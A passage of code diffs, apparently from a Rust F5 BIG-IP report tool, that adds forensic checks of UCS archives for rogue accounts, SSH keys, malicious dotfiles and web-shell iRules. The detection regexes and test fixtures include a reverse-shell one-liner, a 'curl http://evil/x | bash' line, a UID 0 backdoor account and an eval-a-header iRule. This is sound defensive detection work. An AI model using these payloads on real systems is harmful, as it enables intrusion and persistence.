+    assert!(out.contains("authorized_keys"), "ssh key matched: {out}");
+    assert!(!out.contains("etc/passwd"), "glob must not match passwd: {out}");
+}
+
+#[test]
+fn file_attaches_content() {
+    let out = run(r#"file("etc/passwd") | .content"#);
+    assert!(out.contains("backdoor"), "content attached: {out}");
+}
+
+#[test]
+fn grep_returns_matching_lines_scoped_by_glob() {
+    let out = run(r#"grep("backdoor", "etc/passwd")"#);
+    assert!(out.contains("\"line\"") && out.contains("backdoor"), "match row: {out}");
+    // The path glob scopes grep to passwd, not the authorized_keys file.
+    assert!(!out.contains("attacker"), "grep scoped by path glob: {out}");
+}
+
+#[test]
+fn file_builtins_error_without_a_reader() {
+    // Default options have no files_reader → a clear, actionable error.
+    let err = run_query("files", &sources(), &QueryOptions::default()).unwrap_err();
+    assert!(
+        err.to_string().contains("no UCS file reader"),
+        "clear unwired error: {err}"
+    );
+}

--- a/rust/tcl-bigip-report/README.md
+++ b/rust/tcl-bigip-report/README.md
@@ -4,8 +4,10 @@ The Rust port of the [`f5report`](../bigip-query-py) generator: given one or mor
 loaded `(uri, scf_text)` configs it produces a single, self-contained,
 interactive HTML report — object tables, a reference/orphan analysis, an
 **SSL-certificate expiry inventory**, a Mermaid topology explorer, a
-listener/flow simulator and an embedded in-browser `f5-query` console — with no
-server and no external assets.
+listener/flow simulator, an **F5 Sites** tab of community / support / security
+incident-response references plus a UCS forensic (ATT&CK-mapped) hunting
+checklist, and an embedded in-browser `f5-query` console — with no server and no
+external assets.
 
 The heavy lifting (config parsing, object projection, the `referenced_by`
 reference-graph walk) is done by [`tcl-bigip-query`](../tcl-bigip-query); this

--- a/rust/tcl-bigip-report/src/forensics.rs
+++ b/rust/tcl-bigip-report/src/forensics.rs
@@ -1,0 +1,388 @@
+//! UCS forensic inventory: shape the file inventory extracted from a UCS into
+//! the report's Forensics view, and run a few content-driven heuristics that
+//! turn the static "UCS forensic checklist" (see the F5 Sites tab) into live
+//! findings against the archive under review.
+//!
+//! Input is the per-device file inventory the entry points (wasm / CLI) pull
+//! out of the archive with [`tcl_bigip_io::list_ucs_members`] +
+//! [`tcl_bigip_io::read_ucs_member`] — each a JSON object
+//! `{path, size, sha256, isText, content?}`. `content` is present for the small
+//! forensic-allowlisted text files (dotfiles, `passwd`, `authorized_keys`,
+//! syslog config); it stays local to the page (nothing is uploaded) and the UI
+//! masks the sensitive ones by default, exactly like the Secrets tab.
+//!
+//! Output is `{files: [...enriched...], checklist: [...findings...]}`.
+
+use serde_json::{Map, Value as J, json};
+
+/// Stock TMOS / Linux accounts present on a clean BIG-IP. A `passwd` entry
+/// outside this set with a real login shell — or *any* non-`root` UID 0 — is
+/// worth a human look (T1136 Create Account / T1078 Valid Accounts).
+const STOCK_USERS: &[&str] = &[
+    "root",
+    "bin",
+    "daemon",
+    "adm",
+    "lp",
+    "sync",
+    "shutdown",
+    "halt",
+    "mail",
+    "operator",
+    "games",
+    "ftp",
+    "nobody",
+    "admin",
+    "apache",
+    "sshd",
+    "tmshnobody",
+    "f5_remoteuser",
+    "mysql",
+    "named",
+    "ntp",
+    "dbus",
+    "rpc",
+    "rpcuser",
+    "nfsnobody",
+    "nscd",
+    "vcsa",
+    "pcap",
+    "oprofile",
+    "syslog",
+    "postfix",
+    "tomcat",
+    "restnoded",
+    "tmsh",
+];
+
+/// Login shells that mean the account can actually be used interactively (so an
+/// unexpected user with one of these is more interesting than a service stub).
+const LOGIN_SHELLS: &[&str] = &["/bin/bash", "/bin/sh", "/bin/tmsh", "/usr/bin/tmsh"];
+
+fn str_field<'a>(o: &'a Map<String, J>, k: &str) -> &'a str {
+    o.get(k).and_then(J::as_str).unwrap_or("")
+}
+
+/// Broad category for grouping / colouring a member in the UI.
+fn categorise(path: &str) -> &'static str {
+    if path.contains("/.ssh/") || path.starts_with(".ssh/") {
+        "ssh"
+    } else if path == "etc/passwd"
+        || path == "etc/shadow"
+        || path == "etc/group"
+        || path == "etc/gshadow"
+    {
+        "accounts"
+    } else if path.starts_with("etc/openldap/")
+        || path.starts_with("etc/pam.d/")
+        || path.starts_with("etc/security/")
+        || path == "etc/nsswitch.conf"
+        || path == "etc/krb5.conf"
+        || path == "etc/ldap.conf"
+    {
+        "auth"
+    } else if path.starts_with("etc/syslog-ng/") {
+        "logging"
+    } else if path.starts_with("etc/cron") {
+        "cron"
+    } else if (path.starts_with("home/") || path.starts_with("root/"))
+        && path.rsplit('/').next().is_some_and(|b| b.starts_with('.'))
+    {
+        "dotfile"
+    } else {
+        "other"
+    }
+}
+
+/// Whether a member's content is sensitive enough to mask in the UI by default
+/// (password hashes, private keys). Metadata (path/size/hash) is always shown.
+fn is_sensitive(path: &str) -> bool {
+    path == "etc/shadow"
+        || path == "etc/gshadow"
+        || path.ends_with("/id_rsa")
+        || path.ends_with("/id_dsa")
+        || path.ends_with("/id_ecdsa")
+        || path.ends_with("/id_ed25519")
+}
+
+/// Count the real key lines in an `authorized_keys` body (non-blank,
+/// non-comment).
+fn count_authorized_keys(content: &str) -> usize {
+    content
+        .lines()
+        .map(str::trim)
+        .filter(|l| !l.is_empty() && !l.starts_with('#'))
+        .count()
+}
+
+/// Parse `etc/passwd` content into `(user, uid, shell)` rows.
+fn parse_passwd(content: &str) -> Vec<(String, String, String)> {
+    content
+        .lines()
+        .filter_map(|line| {
+            let line = line.trim();
+            if line.is_empty() || line.starts_with('#') {
+                return None;
+            }
+            let f: Vec<&str> = line.split(':').collect();
+            // name:passwd:uid:gid:gecos:home:shell
+            if f.len() < 7 {
+                return None;
+            }
+            Some((f[0].to_string(), f[2].to_string(), f[6].to_string()))
+        })
+        .collect()
+}
+
+/// Build the Forensics model for one device from its file inventory.
+///
+/// `files` is the per-device inventory (JSON objects with `path`, `size`,
+/// `sha256`, `isText` and optionally `content`). Returns
+/// `{files: [...], checklist: [...]}`; both empty when the inventory is empty
+/// (e.g. a `bigip.conf`-only source with no archive behind it).
+#[must_use]
+pub fn collect_forensics(files: &[J]) -> J {
+    let mut out_files: Vec<J> = Vec::with_capacity(files.len());
+    // Checklist accumulators.
+    let mut ak_paths: Vec<String> = Vec::new();
+    let mut ak_keys = 0usize;
+    let mut passwd_added: Vec<String> = Vec::new();
+    let mut passwd_uid0: Vec<String> = Vec::new();
+    let mut passwd_seen = false;
+    let mut dotfiles: Vec<String> = Vec::new();
+    let mut logging_seen = false;
+
+    for f in files {
+        let Some(o) = f.as_object() else { continue };
+        let path = str_field(o, "path").to_string();
+        if path.is_empty() {
+            continue;
+        }
+        let category = categorise(&path);
+        let sensitive = is_sensitive(&path);
+        let content = o.get("content").and_then(J::as_str);
+
+        // Per-file heuristics.
+        if path.ends_with("authorized_keys")
+            && let Some(c) = content
+        {
+            let n = count_authorized_keys(c);
+            if n > 0 {
+                ak_keys += n;
+                ak_paths.push(path.clone());
+            }
+        }
+        if path == "etc/passwd" {
+            passwd_seen = true;
+            if let Some(c) = content {
+                for (user, uid, shell) in parse_passwd(c) {
+                    if uid == "0" && user != "root" {
+                        passwd_uid0.push(user.clone());
+                    }
+                    let stock = STOCK_USERS.contains(&user.as_str());
+                    let interactive = LOGIN_SHELLS.contains(&shell.as_str());
+                    if !stock && interactive {
+                        passwd_added.push(user);
+                    }
+                }
+            }
+        }
+        if category == "dotfile" {
+            dotfiles.push(path.clone());
+        }
+        if category == "logging" {
+            logging_seen = true;
+        }
+
+        out_files.push(json!({
+            "path": path,
+            "size": o.get("size").cloned().unwrap_or(J::from(0)),
+            "sha256": str_field(o, "sha256"),
+            "isText": o.get("isText").and_then(J::as_bool).unwrap_or(false),
+            "category": category,
+            "sensitive": sensitive,
+            // Content is echoed through only for non-sensitive text files; the
+            // UI masks even these behind a reveal, and never embeds the raw
+            // bytes of shadow / private keys.
+            "content": if sensitive { J::Null } else { content.map_or(J::Null, |c| J::String(c.to_owned())) },
+        }));
+    }
+
+    // ---- Checklist findings (most severe first is applied in the UI) -------
+    let mut checklist: Vec<J> = Vec::new();
+
+    // SSH authorized_keys — key-based persistence.
+    let ak_present = out_files.iter().any(|f| {
+        f.get("path")
+            .and_then(J::as_str)
+            .is_some_and(|p| p.ends_with("authorized_keys"))
+    });
+    checklist.push(json!({
+        "id": "ssh-authorized-keys",
+        "label": "SSH authorized_keys",
+        "attack": "T1098.004",
+        "verdict": if ak_keys > 0 { "alert" } else if ak_present { "clear" } else { "absent" },
+        "detail": if ak_keys > 0 {
+            format!("{ak_keys} key(s) present across {} file(s) — verify every key is expected", ak_paths.len())
+        } else if ak_present {
+            "authorized_keys present but empty".to_string()
+        } else {
+            "no authorized_keys in the archive".to_string()
+        },
+        "evidence": ak_paths,
+    }));
+
+    // Local accounts — added users / rogue UID 0.
+    let mut acct_evidence = passwd_uid0.clone();
+    acct_evidence.extend(passwd_added.iter().cloned());
+    let acct_verdict = if !passwd_uid0.is_empty() {
+        "alert"
+    } else if !passwd_added.is_empty() {
+        "warn"
+    } else if passwd_seen {
+        "clear"
+    } else {
+        "absent"
+    };
+    checklist.push(json!({
+        "id": "local-accounts",
+        "label": "Local accounts (passwd)",
+        "attack": "T1136 / T1078",
+        "verdict": acct_verdict,
+        "detail": if !passwd_uid0.is_empty() {
+            format!("non-root UID 0 account(s): {}", passwd_uid0.join(", "))
+        } else if !passwd_added.is_empty() {
+            format!("unrecognised interactive account(s): {}", passwd_added.join(", "))
+        } else if passwd_seen {
+            "only stock accounts with login shells".to_string()
+        } else {
+            "etc/passwd not in the archive".to_string()
+        },
+        "evidence": acct_evidence,
+    }));
+
+    // Shell dotfiles — login-hook persistence surface.
+    checklist.push(json!({
+        "id": "shell-dotfiles",
+        "label": "Shell dotfiles",
+        "attack": "T1546.004",
+        "verdict": if dotfiles.is_empty() { "absent" } else { "info" },
+        "detail": if dotfiles.is_empty() {
+            "no user dotfiles in the archive".to_string()
+        } else {
+            format!("{} dotfile(s) present — review for login-time execution", dotfiles.len())
+        },
+        "evidence": dotfiles,
+    }));
+
+    // Logging config — evasion surface.
+    checklist.push(json!({
+        "id": "logging-config",
+        "label": "syslog-ng config",
+        "attack": "T1562.006",
+        "verdict": if logging_seen { "info" } else { "absent" },
+        "detail": if logging_seen {
+            "syslog-ng config present — confirm remote logging is intact".to_string()
+        } else {
+            "no syslog-ng config in the archive".to_string()
+        },
+        "evidence": J::Array(vec![]),
+    }));
+
+    json!({ "files": out_files, "checklist": checklist })
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn file(path: &str, content: Option<&str>) -> J {
+        let bytes = content.map_or(&b""[..], str::as_bytes);
+        json!({
+            "path": path,
+            "size": bytes.len(),
+            "sha256": "0".repeat(64),
+            "isText": content.is_some(),
+            "content": content,
+        })
+    }
+
+    fn verdict<'a>(f: &'a J, id: &str) -> &'a str {
+        f["checklist"]
+            .as_array()
+            .unwrap()
+            .iter()
+            .find(|c| c["id"] == id)
+            .unwrap_or_else(|| panic!("checklist item {id}"))["verdict"]
+            .as_str()
+            .unwrap()
+    }
+
+    #[test]
+    fn authorized_keys_flagged_when_non_empty() {
+        let flagged = collect_forensics(&[file(
+            "root/.ssh/authorized_keys",
+            Some("# comment\nssh-rsa AAAAB3Nz attacker@host\n"),
+        )]);
+        assert_eq!(verdict(&flagged, "ssh-authorized-keys"), "alert");
+
+        let empty = collect_forensics(&[file("root/.ssh/authorized_keys", Some("# only a comment\n"))]);
+        assert_eq!(verdict(&empty, "ssh-authorized-keys"), "clear");
+
+        let absent = collect_forensics(&[file("etc/motd", Some("hi"))]);
+        assert_eq!(verdict(&absent, "ssh-authorized-keys"), "absent");
+    }
+
+    #[test]
+    fn passwd_added_and_uid0_accounts() {
+        // A rogue non-root UID 0 account → alert.
+        let uid0 = collect_forensics(&[file(
+            "etc/passwd",
+            Some("root:x:0:0::/root:/bin/bash\nbackdoor:x:0:0::/root:/bin/bash\n"),
+        )]);
+        assert_eq!(verdict(&uid0, "local-accounts"), "alert");
+
+        // An unrecognised interactive account (non-zero uid) → warn.
+        let added = collect_forensics(&[file(
+            "etc/passwd",
+            Some("root:x:0:0::/root:/bin/bash\neviluser:x:1200:1200::/home/eviluser:/bin/bash\n"),
+        )]);
+        assert_eq!(verdict(&added, "local-accounts"), "warn");
+
+        // Only stock accounts → clear.
+        let clean = collect_forensics(&[file(
+            "etc/passwd",
+            Some("root:x:0:0::/root:/bin/bash\nnobody:x:99:99::/:/sbin/nologin\n"),
+        )]);
+        assert_eq!(verdict(&clean, "local-accounts"), "clear");
+    }
+
+    #[test]
+    fn sensitive_content_is_not_embedded() {
+        let f = collect_forensics(&[file("etc/shadow", Some("root:$6$abc$def:19000:0:99999:7:::\n"))]);
+        let shadow = &f["files"][0];
+        assert_eq!(shadow["category"], "accounts");
+        assert_eq!(shadow["sensitive"], J::Bool(true));
+        assert_eq!(shadow["content"], J::Null, "shadow content must not be embedded");
+        // But its metadata (hash/size) is still there for diffing.
+        assert_eq!(shadow["sha256"].as_str().unwrap().len(), 64);
+    }
+
+    #[test]
+    fn dotfiles_and_logging_surface_as_info() {
+        let f = collect_forensics(&[
+            file("home/admin/.bashrc", Some("export PATH=$PATH\n")),
+            file("etc/syslog-ng/syslog-ng.conf", Some("destination d_remote {};\n")),
+        ]);
+        assert_eq!(verdict(&f, "shell-dotfiles"), "info");
+        assert_eq!(verdict(&f, "logging-config"), "info");
+        // Non-sensitive text content is echoed for display.
+        let bashrc = f["files"]
+            .as_array()
+            .unwrap()
+            .iter()
+            .find(|x| x["path"] == "home/admin/.bashrc")
+            .unwrap();
+        assert!(bashrc["content"].as_str().unwrap().contains("PATH"));
+    }
+}

--- a/rust/tcl-bigip-report/src/forensics.rs
+++ b/rust/tcl-bigip-report/src/forensics.rs
@@ -134,14 +134,130 @@ fn parse_passwd(content: &str) -> Vec<(String, String, String)> {
         .collect()
 }
 
-/// iRule command-execution / evaluation tokens that are highly unusual in a
-/// legitimate iRule and are the signal for a web-shell / covert-C2 rule
-/// (T1505.003). Matched as whole words in an HTTP-event rule body.
-fn irule_backdoor_hits(rules: &[J]) -> Vec<String> {
-    // Whole-word `eval`, `exec`, or the `[whereis]`/`[subst]`-on-input shape.
-    let risky = regex::Regex::new(r"(?m)\b(eval|exec)\b").expect("valid regex");
-    let http_evt = regex::Regex::new(r"\bHTTP_(REQUEST|RESPONSE)\b").expect("valid regex");
-    let mut hits = Vec::new();
+/// Scan a shell dotfile's content for login-persistence / malware patterns
+/// (T1546.004). Returns the worst severity seen and the reasons, ignoring
+/// comment lines (a `#`-commented line does not execute on login).
+///
+/// Regex-level for now (a shell-aware parser is the planned upgrade): the real
+/// `.bashrc` implants aren't grammar-obfuscated — they bet on the file being
+/// unread — so a focused pattern set catches the live-fire shapes.
+fn scan_shell_dotfile(content: &str) -> Option<(&'static str, &'static str)> {
+    // Uncomment-stripped body: drop whole-line comments so a documented example
+    // in a comment doesn't trip the scan.
+    let live: String = content
+        .lines()
+        .filter(|l| !l.trim_start().starts_with('#'))
+        .collect::<Vec<_>>()
+        .join("\n");
+
+    // alert-level: download|decode piped/substituted into an interpreter, or a
+    // reverse shell — code actually fetched and run at login.
+    let downloader = r"(curl|wget|fetch|lynx|python[0-9.]*\s+-c|perl\s+-e)";
+    let interp = r"(sh|bash|zsh|ksh|python[0-9.]*|perl|ruby|php|node)";
+    let pipe_to_interp =
+        regex::Regex::new(&format!(r"(?s){downloader}[^|;&`$]*\|\s*{interp}\b")).expect("re");
+    let decode_to_interp = regex::Regex::new(&format!(
+        r"(?s)\b(base64\s+(-d|--decode)|xxd\s+-r|openssl\s+enc[^|]*-d)\b[^|]*\|\s*{interp}\b"
+    ))
+    .expect("re");
+    let subst_exec = regex::Regex::new(&format!(
+        r"(?s)\b(eval|source|\.)\s+[\x22\x27]?[`$]\(?[^)]*{downloader}"
+    ))
+    .expect("re");
+    let reverse_shell = regex::Regex::new(
+        r"(/dev/tcp/|bash\s+-i\b|mkfifo\b|nc\s+[^|]*-e\b|socket\.socket|/dev/udp/)",
+    )
+    .expect("re");
+    if pipe_to_interp.is_match(&live)
+        || decode_to_interp.is_match(&live)
+        || subst_exec.is_match(&live)
+        || reverse_shell.is_match(&live)
+    {
+        return Some(("alert", "downloads-and-runs code or opens a reverse shell at login"));
+    }
+
+    // warn-level: persistence bookkeeping — key/cron install run from a dotfile.
+    let key_append =
+        regex::Regex::new(r"(?s)authorized_keys|\.ssh/").expect("re");
+    let scheduling = regex::Regex::new(r"\b(crontab\b|\bat\s+now|systemctl\s+enable)").expect("re");
+    if key_append.is_match(&live) || scheduling.is_match(&live) {
+        return Some(("warn", "writes SSH keys or schedules a task from a login file"));
+    }
+    None
+}
+
+/// Users in `etc/shadow` with an empty password field (`user::…`) — they can log
+/// in with no password. Content is analysed but never embedded in the report.
+fn shadow_passwordless(content: &str) -> Vec<String> {
+    content
+        .lines()
+        .filter_map(|line| {
+            let f: Vec<&str> = line.trim().split(':').collect();
+            // name:hash:… — an empty hash field means no password required.
+            (f.len() >= 2 && f[1].is_empty() && !f[0].is_empty()).then(|| f[0].to_owned())
+        })
+        .collect()
+}
+
+/// One iRule finding: the rule name, a severity (`alert`/`warn`), and the
+/// human-readable reason it tripped.
+struct IruleFinding {
+    name: String,
+    severity: &'static str,
+    reason: &'static str,
+}
+
+/// Precompiled patterns for the iRule web-shell / covert-C2 scan. Compiled once
+/// per report (not per rule).
+struct IruleSigs {
+    /// Attacker-controlled request data getters (taint sources).
+    source: regex::Regex,
+    /// `b64decode` / `URI::decode` / `hexdecode` of (usually attacker) data.
+    decode: regex::Regex,
+    /// Tcl code-evaluation sinks — running data as code.
+    code_sink: regex::Regex,
+    /// Off-box connections an implant uses for C2 / exfil.
+    net_sink: regex::Regex,
+    /// iRules LX bridge into Node.js — arbitrary code outside the TMM sandbox.
+    ilx: regex::Regex,
+    /// A magic constant compared against a header/cookie/URI — a backdoor
+    /// trigger that unlocks a privileged branch.
+    magic_trigger: regex::Regex,
+    /// A client-facing event — the rule runs while processing a request, so a
+    /// code sink in it is attacker-reachable even if the taint isn't textual.
+    event: regex::Regex,
+}
+
+impl IruleSigs {
+    fn new() -> Self {
+        // `expect` is safe: these are fixed, tested literals.
+        IruleSigs {
+            source: regex::Regex::new(
+                r"\b(HTTP::(uri|path|query|header|cookie|payload|host|method|username|password)|URI::(query|decode|basename)|TCP::payload|UDP::payload|SSL::payload|WEBSOCKET::payload|STREAM::)\b",
+            ).expect("valid regex"),
+            decode: regex::Regex::new(r"\b(b64decode|URI::decode|hexdecode)\b").expect("valid regex"),
+            code_sink: regex::Regex::new(r"(?m)(\beval\b|\bsubst\b|\buplevel\b|\bnamespace\s+eval\b)").expect("valid regex"),
+            net_sink: regex::Regex::new(r"\b(sideband|connect|SIDEBAND|HSL::send|GENICMP)\b").expect("valid regex"),
+            ilx: regex::Regex::new(r"\bILX::call\b").expect("valid regex"),
+            magic_trigger: regex::Regex::new(
+                r#"(?m)\[HTTP::(header|cookie|query|uri)[^\]]*\]\s*(eq|equals|contains|starts_with|ends_with|matches)\s*[\"'{][^\"'}]+[\"'}]"#,
+            ).expect("valid regex"),
+            event: regex::Regex::new(
+                r"\bwhen\s+(HTTP_REQUEST|HTTP_RESPONSE|HTTP_REQUEST_DATA|HTTP_RESPONSE_DATA|CLIENT_DATA|CLIENT_ACCEPTED|WEBSOCKET_[A-Z_]+)\b",
+            ).expect("valid regex"),
+        }
+    }
+}
+
+/// Scan the device's iRules for web-shell / covert-C2 shapes (T1505.003).
+///
+/// Regex-level correlation (a deeper taint-analysis pass over the compiler's
+/// SSA is the planned upgrade): an attacker-controlled request getter flowing
+/// near a code-evaluation or off-box sink is the strongest "runs attacker
+/// input" signal; a magic-constant trigger or a bare `eval`/`subst` is weaker.
+fn scan_irules(rules: &[J]) -> Vec<IruleFinding> {
+    let sigs = IruleSigs::new();
+    let mut findings = Vec::new();
     for r in rules {
         let Some(o) = r.as_object() else { continue };
         // Skip TMOS defaults (`_sys_*`) — never attacker-authored.
@@ -152,13 +268,36 @@ fn irule_backdoor_hits(rules: &[J]) -> Vec<String> {
         if body.is_empty() {
             continue;
         }
-        if http_evt.is_match(body) && risky.is_match(body) {
-            let name = str_field(o, "fullPath");
-            let name = if name.is_empty() { str_field(o, "name") } else { name };
-            hits.push(name.to_owned());
-        }
+        let has_source = sigs.source.is_match(body);
+        let has_decode = sigs.decode.is_match(body);
+        let has_code = sigs.code_sink.is_match(body);
+        let has_net = sigs.net_sink.is_match(body);
+        let has_ilx = sigs.ilx.is_match(body);
+        let has_event = sigs.event.is_match(body);
+
+        let (severity, reason) = if has_code && (has_source || has_decode) {
+            ("alert", "attacker-controlled request data reaches a Tcl code-evaluation sink (eval/subst)")
+        } else if has_net && (has_source || has_decode) {
+            ("alert", "attacker-controlled data is sent off-box (sideband / HSL) — possible C2 / exfil")
+        } else if has_ilx && (has_source || has_decode) {
+            ("alert", "attacker-controlled data is passed to an iRules LX (Node.js) call")
+        } else if has_ilx {
+            ("warn", "calls out to iRules LX (Node.js) — review the extension")
+        } else if has_net {
+            ("warn", "opens an off-box connection (sideband / HSL) — review the destination")
+        } else if has_code && has_event {
+            ("warn", "runs a Tcl code-evaluation sink (eval/subst) while processing a request")
+        } else if sigs.magic_trigger.is_match(body) {
+            ("warn", "branches on a hard-coded header/cookie/URI value — a possible backdoor trigger")
+        } else {
+            continue;
+        };
+
+        let name = str_field(o, "fullPath");
+        let name = if name.is_empty() { str_field(o, "name") } else { name };
+        findings.push(IruleFinding { name: name.to_owned(), severity, reason });
     }
-    hits
+    findings
 }
 
 /// Build the Forensics model for one device from its file inventory and iRules.
@@ -177,7 +316,10 @@ pub fn collect_forensics(files: &[J], rules: &[J]) -> J {
     let mut passwd_added: Vec<String> = Vec::new();
     let mut passwd_uid0: Vec<String> = Vec::new();
     let mut passwd_seen = false;
+    let mut shadow_nopass: Vec<String> = Vec::new();
     let mut dotfiles: Vec<String> = Vec::new();
+    let mut dotfile_alert: Vec<String> = Vec::new();
+    let mut dotfile_warn: Vec<String> = Vec::new();
     let mut logging_seen = false;
 
     for f in files {
@@ -217,6 +359,18 @@ pub fn collect_forensics(files: &[J], rules: &[J]) -> J {
         }
         if category == "dotfile" {
             dotfiles.push(path.clone());
+            if let Some(c) = content {
+                match scan_shell_dotfile(c) {
+                    Some(("alert", _)) => dotfile_alert.push(path.clone()),
+                    Some(("warn", _)) => dotfile_warn.push(path.clone()),
+                    _ => {}
+                }
+            }
+        }
+        if path == "etc/shadow"
+            && let Some(c) = content
+        {
+            shadow_nopass.extend(shadow_passwordless(c));
         }
         if category == "logging" {
             logging_seen = true;
@@ -260,12 +414,13 @@ pub fn collect_forensics(files: &[J], rules: &[J]) -> J {
         "evidence": ak_paths,
     }));
 
-    // Local accounts — added users / rogue UID 0.
+    // Local accounts — rogue UID 0, added interactive users, passwordless logins.
     let mut acct_evidence = passwd_uid0.clone();
     acct_evidence.extend(passwd_added.iter().cloned());
+    acct_evidence.extend(shadow_nopass.iter().cloned());
     let acct_verdict = if !passwd_uid0.is_empty() {
         "alert"
-    } else if !passwd_added.is_empty() {
+    } else if !passwd_added.is_empty() || !shadow_nopass.is_empty() {
         "warn"
     } else if passwd_seen {
         "clear"
@@ -274,13 +429,17 @@ pub fn collect_forensics(files: &[J], rules: &[J]) -> J {
     };
     checklist.push(json!({
         "id": "local-accounts",
-        "label": "Local accounts (passwd)",
+        "label": "Local accounts (passwd / shadow)",
         "attack": "T1136 / T1078",
         "verdict": acct_verdict,
         "detail": if !passwd_uid0.is_empty() {
             format!("non-root UID 0 account(s): {}", passwd_uid0.join(", "))
+        } else if !passwd_added.is_empty() && !shadow_nopass.is_empty() {
+            format!("added account(s): {}; passwordless: {}", passwd_added.join(", "), shadow_nopass.join(", "))
         } else if !passwd_added.is_empty() {
             format!("unrecognised interactive account(s): {}", passwd_added.join(", "))
+        } else if !shadow_nopass.is_empty() {
+            format!("account(s) with an empty password: {}", shadow_nopass.join(", "))
         } else if passwd_seen {
             "only stock accounts with login shells".to_string()
         } else {
@@ -289,18 +448,37 @@ pub fn collect_forensics(files: &[J], rules: &[J]) -> J {
         "evidence": acct_evidence,
     }));
 
-    // Shell dotfiles — login-hook persistence surface.
+    // Shell dotfiles — login-hook persistence (content-scanned for download-run
+    // / reverse-shell / key-install shapes).
+    let dot_verdict = if !dotfile_alert.is_empty() {
+        "alert"
+    } else if !dotfile_warn.is_empty() {
+        "warn"
+    } else if dotfiles.is_empty() {
+        "absent"
+    } else {
+        "info"
+    };
+    let mut dot_evidence = dotfile_alert.clone();
+    dot_evidence.extend(dotfile_warn.iter().cloned());
+    if dot_evidence.is_empty() {
+        dot_evidence.clone_from(&dotfiles);
+    }
     checklist.push(json!({
         "id": "shell-dotfiles",
         "label": "Shell dotfiles",
         "attack": "T1546.004",
-        "verdict": if dotfiles.is_empty() { "absent" } else { "info" },
-        "detail": if dotfiles.is_empty() {
+        "verdict": dot_verdict,
+        "detail": if !dotfile_alert.is_empty() {
+            format!("{} dotfile(s) download-and-run code or open a reverse shell at login", dotfile_alert.len())
+        } else if !dotfile_warn.is_empty() {
+            format!("{} dotfile(s) install SSH keys or schedule tasks at login", dotfile_warn.len())
+        } else if dotfiles.is_empty() {
             "no user dotfiles in the archive".to_string()
         } else {
-            format!("{} dotfile(s) present — review for login-time execution", dotfiles.len())
+            format!("{} dotfile(s) present — none matched a known persistence pattern", dotfiles.len())
         },
-        "evidence": dotfiles,
+        "evidence": dot_evidence,
     }));
 
     // Logging config — evasion surface.
@@ -317,19 +495,31 @@ pub fn collect_forensics(files: &[J], rules: &[J]) -> J {
         "evidence": J::Array(vec![]),
     }));
 
-    // iRule web-shell / covert C2 — command execution in an HTTP-event rule.
-    let irule_hits = irule_backdoor_hits(rules);
+    // iRule web-shell / covert C2 — attacker input reaching a code / off-box
+    // sink, backdoor triggers, iRules LX.
+    let irule_findings = scan_irules(rules);
+    let ir_alert: Vec<&IruleFinding> = irule_findings.iter().filter(|f| f.severity == "alert").collect();
+    let ir_reason = irule_findings.first().map_or("", |f| f.reason);
+    let ir_verdict = if !ir_alert.is_empty() {
+        "alert"
+    } else if !irule_findings.is_empty() {
+        "warn"
+    } else {
+        "clear"
+    };
     checklist.push(json!({
         "id": "irule-backdoor",
-        "label": "iRule command execution",
+        "label": "iRule web shell / C2",
         "attack": "T1505.003",
-        "verdict": if irule_hits.is_empty() { "clear" } else { "warn" },
-        "detail": if irule_hits.is_empty() {
-            "no HTTP-event iRule uses eval/exec".to_string()
+        "verdict": ir_verdict,
+        "detail": if irule_findings.is_empty() {
+            "no iRule reaches a code / off-box sink from attacker input".to_string()
+        } else if !ir_alert.is_empty() {
+            format!("{} iRule(s) flagged — e.g. {ir_reason}", irule_findings.len())
         } else {
-            format!("{} HTTP-event iRule(s) use eval/exec — review for a web shell", irule_hits.len())
+            format!("{} iRule(s) to review — e.g. {ir_reason}", irule_findings.len())
         },
-        "evidence": irule_hits,
+        "evidence": irule_findings.iter().map(|f| J::String(f.name.clone())).collect::<Vec<_>>(),
     }));
 
     // Count the actionable findings so the report can surface the tab even for
@@ -446,28 +636,76 @@ mod tests {
         let rule = |name: &str, body: &str, default: bool| {
             json!({"name": name, "fullPath": format!("/Common/{name}"), "body": body, "isDefault": default})
         };
-        // HTTP-event rule using eval → warn, with the rule named as evidence.
+        // Attacker input (HTTP::header) → decode → eval: the web-shell shape → alert.
         let bad = collect_forensics(
             &[],
             &[rule("shell", "when HTTP_REQUEST { eval [b64decode [HTTP::header X-Cmd]] }", false)],
         );
-        assert_eq!(verdict(&bad, "irule-backdoor"), "warn");
+        assert_eq!(verdict(&bad, "irule-backdoor"), "alert");
         assert_eq!(bad["checklist"].as_array().unwrap().iter()
             .find(|c| c["id"] == "irule-backdoor").unwrap()["evidence"][0], "/Common/shell");
 
-        // A benign HTTP rule (no eval/exec) → clear.
+        // A benign HTTP rule (no eval/source/sink) → clear.
         let ok = collect_forensics(
             &[],
             &[rule("redirect", "when HTTP_REQUEST { HTTP::redirect https://x/ }", false)],
         );
         assert_eq!(verdict(&ok, "irule-backdoor"), "clear");
 
-        // `eval` outside an HTTP event, and a _sys_ default, don't trip it.
-        let non_http = collect_forensics(
+        // eval of a constant outside a request event, and a _sys_ default, don't trip it.
+        let benign = collect_forensics(
             &[],
             &[rule("startup", "when RULE_INIT { eval {set x 1} }", false),
               rule("_sys_https_redirect", "when HTTP_REQUEST { eval x }", true)],
         );
-        assert_eq!(verdict(&non_http, "irule-backdoor"), "clear");
+        assert_eq!(verdict(&benign, "irule-backdoor"), "clear");
+
+        // eval while processing a request (no obvious source) → warn, not alert.
+        let review = collect_forensics(
+            &[],
+            &[rule("dyn", "when HTTP_REQUEST { eval $cmd }", false)],
+        );
+        assert_eq!(verdict(&review, "irule-backdoor"), "warn");
+
+        // Off-box C2 of attacker data → alert.
+        let c2 = collect_forensics(
+            &[],
+            &[rule("beacon", "when HTTP_REQUEST { set d [HTTP::uri]; sideband send $d }", false)],
+        );
+        assert_eq!(verdict(&c2, "irule-backdoor"), "alert");
+    }
+
+    #[test]
+    fn dotfile_download_run_flagged_alert() {
+        // curl | bash at login → alert.
+        let a = fx(&[file("root/.bashrc", Some("export PATH=$PATH\ncurl http://evil/x | bash\n"))]);
+        assert_eq!(verdict(&a, "shell-dotfiles"), "alert");
+
+        // base64 -d | sh → alert.
+        let b = fx(&[file("home/admin/.bash_profile", Some("echo aGkK | base64 -d | sh\n"))]);
+        assert_eq!(verdict(&b, "shell-dotfiles"), "alert");
+
+        // A reverse shell → alert.
+        let rs = fx(&[file("root/.bashrc", Some("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1\n"))]);
+        assert_eq!(verdict(&rs, "shell-dotfiles"), "alert");
+
+        // Installing an SSH key from a dotfile → warn.
